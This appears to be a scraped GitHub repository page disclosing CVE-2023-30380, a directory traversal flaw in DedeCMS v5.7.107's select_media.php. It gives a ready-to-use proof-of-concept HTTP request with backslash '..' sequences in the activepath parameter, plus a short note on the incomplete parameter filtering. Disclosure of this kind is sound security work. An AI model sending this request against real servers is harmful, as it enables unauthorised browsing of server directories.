Headline
CVE-2023-30380: GitHub - Howard512966/DedeCMS-v5.7.107-Directory-Traversal: dedecms Directory Traversal
An issue in the component /dialog/select_media.php of DedeCMS v5.7.107 allows attackers to execute a directory traversal.
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
1 branch 0 tags
Code
Use Git or checkout with SVN using the web URL.
Open with GitHub Desktop
Download ZIP
Latest commit
FilesPermalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
dedecms-Directory-Traversal
DedeCMS v5.7.107 Directory Traversal
dedecms is a website building system. Its v5.7.107 and below have a directory traversal vulnerability. An attacker can traverse server directories
poc:
GET /include/dialog/select_media.php?f=&activepath=\uploads\media\..\..\..\..\ HTTP/1.1
Host: 192.168.1.103
Cookie: PHPSESSID=ggcnj9euppapcl74tjh59hqri6;
Connection: close
White box audit: Vulnerability location: include\dialog\select_media.php Lines 20 and 21 do not completely filter the parameters passed in by the user. If the system is windows, it can be bypassed